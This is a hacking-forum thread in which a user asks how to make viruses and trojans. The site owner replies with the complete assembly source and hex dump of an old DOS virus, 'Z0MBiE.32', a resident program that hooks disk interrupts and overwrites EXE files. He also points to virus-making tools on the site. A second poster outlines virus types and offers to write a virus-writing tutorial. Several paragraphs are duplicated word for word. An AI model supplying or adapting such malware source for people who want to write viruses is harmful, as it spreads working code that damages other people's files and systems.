CoDinG program
CoDinG program
anYoNe know coding programs that can make vyrus nd trojan .. . Pllzz tell me .. i wnT to learn .
- bad_brain
- Site Owner
- Posts: 11638
- Joined: 06 Apr 2005, 16:00
- 19
- Location: In your eye floaters.
- Contact:
there are apps of this kind in the dl-section. but don´t expect a GUI where you just have to click some buttons, without deeper knowledge you will only corrupt your own system.
here´s the source of an old DOS virus:
and this is a VERY basic one....
most new viruses nowadays are based on other viruses, only the source has been slightly edited, but without knowing Assembler it makes no sense to get into it. learning Assembler is a pain in the ass, if your only intention is to code viruses you will not make it....
here´s the source of an old DOS virus:
Code: Select all
; Z0MBiE.32
; - 32-byte length
; - resident, hooks INT 13 via INT 2F
; - EXE-overwriting
; - DOS-only
; - very unstable
; EXECUTABLE:
; CODE:
;
; 0100 B4 13 CD 2F 0E 1F BA 14-01 06 53 66 8F 06 20 01
; 0110 CD 2F CD 27 26 80 3F 4D-75 05 0E 07 BB 00 01 EA
; SOURCE:
model tiny
p386
codeseg
org 100h
start:
mov ah, 13h
int 2Fh
push cs
pop ds
lea dx, int13
push es
push bx
pop dword ptr old13
; pop dword ptr [edx+old13-int13]
int 2Fh
; xchg dx, ax
int 27h
int13: ; cmp ah, 03h
; jne exit13
cmp byte ptr es:[bx], 'M'
jne exit13
push cs
pop es
lea bx, start
exit13: db 0EAh
old13 dd ?
end start
most new viruses nowadays are based on other viruses, only the source has been slightly edited, but without knowing Assembler it makes no sense to get into it. learning Assembler is a pain in the ass, if your only intention is to code viruses you will not make it....
-
- cyber messiah
- Posts: 1201
- Joined: 30 Apr 2006, 16:00
- 18
- Location: 127.0.0.1
To be able to code your own viruses you have to learn assembly if you dont know already,
as far as i know,(incase my knowledge is not outdated) viruses are of several types e.g boot sector virus, program virus, multipartite virus, polymorphic, macro... etc.
yeah there can be custom viruses written to do specific things, what you need to do is understand the basic concepts.
ok its not neccessary that you code your virus in assembly only, you can create your virus in a batch file or also use any language like c/c++ provided you are a wizard. still in that case as well you might need to know how to use inline assembly with c++, well actuall virus is a vast topic and cannot be explained here, since you have mentioned it, i am thinking of writing a tutorial on viruses, (i have never done this before,and ofcourse i will make sure that i will provide you latest updated knowledge) any one wants to add his knowledge or help me is most welcome.
as far as i know,(incase my knowledge is not outdated) viruses are of several types e.g boot sector virus, program virus, multipartite virus, polymorphic, macro... etc.
yeah there can be custom viruses written to do specific things, what you need to do is understand the basic concepts.
ok its not neccessary that you code your virus in assembly only, you can create your virus in a batch file or also use any language like c/c++ provided you are a wizard. still in that case as well you might need to know how to use inline assembly with c++, well actuall virus is a vast topic and cannot be explained here, since you have mentioned it, i am thinking of writing a tutorial on viruses, (i have never done this before,and ofcourse i will make sure that i will provide you latest updated knowledge) any one wants to add his knowledge or help me is most welcome.